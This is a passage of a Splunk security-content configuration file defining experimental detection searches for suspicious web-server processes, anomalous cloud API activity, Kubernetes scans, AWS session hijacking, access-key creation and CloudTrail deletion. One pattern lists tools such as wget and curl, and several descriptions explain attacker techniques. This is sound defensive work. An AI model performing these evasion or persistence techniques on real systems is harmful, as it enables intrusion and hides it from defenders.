Processes.dest_category="web_server" AND (Processes.process="*whoami*" OR Processes.process="*ping*" OR Processes.process="*iptables*" OR Processes.process="*wget*" OR Processes.process="*service*" OR Processes.process="*curl*") by Processes.process Processes.process_name, Processes.dest Processes.user| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_servers_executing_suspicious_processes_filter` [ESCU - Abnormally High Number Of Cloud Infrastructure API Calls - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will detect a spike in the number of API calls made to your cloud infrastructure environment by a user. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search will detect a spike in the number of API calls made to your cloud infrastructure environment by a user. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Infrastructure API Calls Per User` to create the probability density function. action.escu.known_false_positives = action.escu.creation_date = 2020-09-07 action.escu.modification_date = 2020-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Infrastructure API Calls - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud User Activities", "Compromised User Account"] action.risk = 1 action.risk.param._risk_message = user $user$ has made $api_calls$ api calls, violating the dynamic threshold of $expected_upper_threshold$ with the following command $command$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Infrastructure API Calls - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities", "Compromised User Account"], "cis20": ["CIS 13"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count as api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_api_calls_v1 threshold=0.005 | rename "IsOutlier(api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where api_calls > expected_upper_threshold | eval distance_from_threshold = api_calls - expected_upper_threshold | table _time, user, command, api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_infrastructure_api_calls_filter` [ESCU - Abnormally High Number Of Cloud Instances Destroyed - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search finds for the number successfully destroyed cloud instances for every 4 hour block. This is split up between weekdays and the weekend. It then applies the probability densitiy model previously created and alerts on any outliers. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search finds for the number successfully destroyed cloud instances for every 4 hour block. This is split up between weekdays and the weekend. It then applies the probability densitiy model previously created and alerts on any outliers. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Destroyed` to create the probability density function. action.escu.known_false_positives = Many service accounts configured within a cloud infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user. action.escu.creation_date = 2020-08-21 action.escu.modification_date = 2020-08-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Instances Destroyed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Instance Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Instances Destroyed - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count as instances_destroyed values(All_Changes.object_id) as object_id from datamodel=Change where All_Changes.action=deleted AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_destroyed_v1] | where cardinality >=16 | apply cloud_excessive_instances_destroyed_v1 threshold=0.005 | rename "IsOutlier(instances_destroyed)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_destroyed - expected_upper_threshold | table _time, user, instances_destroyed, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_destroyed_filter` [ESCU - Abnormally High Number Of Cloud Instances Launched - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search finds for the number successfully created cloud instances for every 4 hour block. This is split up between weekdays and the weekend. It then applies the probability densitiy model previously created and alerts on any outliers. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search finds for the number successfully created cloud instances for every 4 hour block. This is split up between weekdays and the weekend. It then applies the probability densitiy model previously created and alerts on any outliers. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Instances Launched` to create the probability density function. action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user. action.escu.creation_date = 2020-08-21 action.escu.modification_date = 2020-08-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Instances Launched - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Cloud Cryptomining", "Suspicious Cloud Instance Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Instances Launched - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining", "Suspicious Cloud Instance Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count as instances_launched values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=created) AND All_Changes.status=success AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join HourOfDay isWeekend [summary cloud_excessive_instances_created_v1] | where cardinality >=16 | apply cloud_excessive_instances_created_v1 threshold=0.005 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | eval distance_from_threshold = instances_launched - expected_upper_threshold | table _time, user, instances_launched, expected_upper_threshold, distance_from_threshold, object_id | `abnormally_high_number_of_cloud_instances_launched_filter` [ESCU - Abnormally High Number Of Cloud Security Group API Calls - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will detect a spike in the number of API calls made to your cloud infrastructure environment about security groups by a user. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search will detect a spike in the number of API calls made to your cloud infrastructure environment about security groups by a user. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Security Group API Calls Per User` to create the probability density function model. action.escu.known_false_positives = action.escu.creation_date = 2020-09-07 action.escu.modification_date = 2020-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Security Group API Calls - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud User Activities"] action.risk = 1 action.risk.param._risk_message = user $user$ has made $api_calls$ api calls related to security groups, violating the dynamic threshold of $expected_upper_threshold$ with the following command $command$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Security Group API Calls - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count as security_group_api_calls values(All_Changes.command) as command from datamodel=Change where All_Changes.object_category=firewall AND All_Changes.status=success by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time, "%H") | eval HourOfDay=floor(HourOfDay/4)*4 | eval DayOfWeek=strftime(_time, "%w") | eval isWeekend=if(DayOfWeek >= 1 AND DayOfWeek <= 5, 0, 1) | join user HourOfDay isWeekend [ summary cloud_excessive_security_group_api_calls_v1] | where cardinality >=16 | apply cloud_excessive_security_group_api_calls_v1 threshold=0.005 | rename "IsOutlier(security_group_api_calls)" as isOutlier | where isOutlier=1 | eval expected_upper_threshold = mvindex(split(mvindex(BoundaryRanges, -1), ":"), 0) | where security_group_api_calls > expected_upper_threshold | eval distance_from_threshold = security_group_api_calls - expected_upper_threshold | table _time, user, command, security_group_api_calls, expected_upper_threshold, distance_from_threshold | `abnormally_high_number_of_cloud_security_group_api_calls_filter` [ESCU - Amazon EKS Kubernetes cluster scan detection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster in AWS action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster in AWS action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudWatch EKS Logs inputs. action.escu.known_false_positives = Not all unauthenticated requests are malicious, but frequency, UA and source IPs will provide context. action.escu.creation_date = 2020-04-15 action.escu.modification_date = 2020-04-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Amazon EKS Kubernetes cluster scan detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Kubernetes Scanning Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Amazon EKS Kubernetes cluster scan detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` "user.username"="system:anonymous" userAgent!="AWS Security Scanner" | rename sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(source) as cluster_name values(responseStatus.code) values(userAgent) as http_user_agent values(verb) values(requestURI) by src_ip user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` |`amazon_eks_kubernetes_cluster_scan_detection_filter` [ESCU - Amazon EKS Kubernetes Pod scan detection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects unauthenticated requests made against the Kubernetes' Pods API through proactive monitoring to protect the Kubernetes environment from unauthorized access and potential security breaches. The detection is made by using the Splunk query `aws_cloudwatchlogs_eks` with specific filters to identify these requests. Identifies events where the `user.username` is set to "system:anonymous", the `verb` is set to "list", and the `objectRef.resource` is set to "pods". Additionally, the search checks if the `requestURI` is equal to "/api/v1/pods". Analyzing these events helps you to identify any unauthorized access attempts to the Kubernetes' Pods API. Unauthenticated requests can indicate potential security breaches or unauthorized access to sensitive resources within the Kubernetes environment. The detection is important because unauthorized access to Kubernetes' Pods API can lead to the compromise of sensitive data, unauthorized execution of commands, or even the potential for lateral movement within the Kubernetes cluster. False positives might occur since there might be legitimate use cases for unauthenticated requests in certain scenarios. Therefore, you must review and validate any detected events before taking any action. Next steps include investigating the incident to mitigate any ongoing threats, and strengthening the security measures to prevent future unauthorized access attempts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthenticated requests made against the Kubernetes' Pods API through proactive monitoring to protect the Kubernetes environment from unauthorized access and potential security breaches. The detection is made by using the Splunk query `aws_cloudwatchlogs_eks` with specific filters to identify these requests. Identifies events where the `user.username` is set to "system:anonymous", the `verb` is set to "list", and the `objectRef.resource` is set to "pods". Additionally, the search checks if the `requestURI` is equal to "/api/v1/pods". Analyzing these events helps you to identify any unauthorized access attempts to the Kubernetes' Pods API. Unauthenticated requests can indicate potential security breaches or unauthorized access to sensitive resources within the Kubernetes environment. The detection is important because unauthorized access to Kubernetes' Pods API can lead to the compromise of sensitive data, unauthorized execution of commands, or even the potential for lateral movement within the Kubernetes cluster. False positives might occur since there might be legitimate use cases for unauthenticated requests in certain scenarios. Therefore, you must review and validate any detected events before taking any action. Next steps include investigating the incident to mitigate any ongoing threats, and strengthening the security measures to prevent future unauthorized access attempts. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on forAWS (version 4.4.0 or later), then configure your AWS CloudWatch EKS Logs.Please also customize the `kubernetes_pods_aws_scan_fingerprint_detection` macro to filter out the false positives. action.escu.known_false_positives = Not all unauthenticated requests are malicious, but frequency, UA and source IPs and direct request to API provide context. action.escu.creation_date = 2020-04-15 action.escu.modification_date = 2020-04-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Amazon EKS Kubernetes Pod scan detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Kubernetes Scanning Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Amazon EKS Kubernetes Pod scan detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` "user.username"="system:anonymous" verb=list objectRef.resource=pods requestURI="/api/v1/pods" | rename source as cluster_name sourceIPs{} as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(responseStatus.reason) values(responseStatus.code) values(userAgent) values(verb) values(requestURI) by src_ip cluster_name user.username user.groups{} | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `amazon_eks_kubernetes_pod_scan_detection_filter` [ESCU - ASL AWS Concurrent Sessions From Different Ips - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = A user with concurrent sessions from different Ips may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment. action.escu.creation_date = 2023-05-23 action.escu.modification_date = 2023-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS Concurrent Sessions From Different Ips - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["Compromised User Account", "AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $identity.user.name$ has concurrent sessions from more than one unique IP address $src_endpoint.ip$ in the span of 5 minutes. action.risk.param._risk = [{"risk_object_field": "identity.user.credential_uid", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS Concurrent Sessions From Different Ips - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation=DescribeEventAggregates src_endpoint.domain!="AWS Internal" | bin span=5m _time | stats values(src_endpoint.ip) as src_endpoint.ip dc(src_endpoint.ip) as distinct_ip_count by _time identity.user.credential_uid identity.user.name | where distinct_ip_count > 1 | `aws_concurrent_sessions_from_different_ips_filter` [ESCU - ASL AWS CreateAccessKey - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates a IAM access key for another user who may have higher privilleges, which can be a sign for privilege escalation. Hunting queries are designed to be executed manual during threat hunting. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates a IAM access key for another user who may have higher privilleges, which can be a sign for privilege escalation. Hunting queries are designed to be executed manual during threat hunting. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created keys for another user. action.escu.creation_date = 2022-05-23 action.escu.modification_date = 2022-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS CreateAccessKey - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS CreateAccessKey - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation=CreateAccessKey http_request.user_agent!=console.amazonaws.com api.response.error=null | rename unmapped{}.key as unmapped_key , unmapped{}.value as unmapped_value | eval keyjoin=mvzip(unmapped_key,unmapped_value) | mvexpand keyjoin | rex field=keyjoin "^(?[^,]+),(?.*)$" | eval {key} = value | search responseElements.accessKey.userName = * | rename identity.user.name as identity_user_name, responseElements.accessKey.userName as responseElements_accessKey_userName | eval match=if(identity_user_name=responseElements_accessKey_userName,1,0) | search match=0 | rename identity_user_name as identity.user.name , responseElements_accessKey_userName as responseElements.accessKey.userName | stats count min(_time) as firstTime max(_time) as lastTime by responseElements.accessKey.userName api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`asl_aws_createaccesskey_filter` [ESCU - ASL AWS Defense Evasion Delete Cloudtrail - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the the entire cloudtrail that is logging activities in the environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the the entire cloudtrail that is logging activities in the environment. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has stopped cloudTrail logging. Please investigate this activity. action.escu.creation_date = 2023-05-31 action.escu.modification_date = 2023-05-31 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS Defense Evasion Delete Cloudtrail - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $identity.user.name$ has delete a CloudTrail logging for account id $identity.user.account_uid$ action.risk.param._risk = [{"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}, {"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS Defense Evasion Delete Cloudtrail - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": 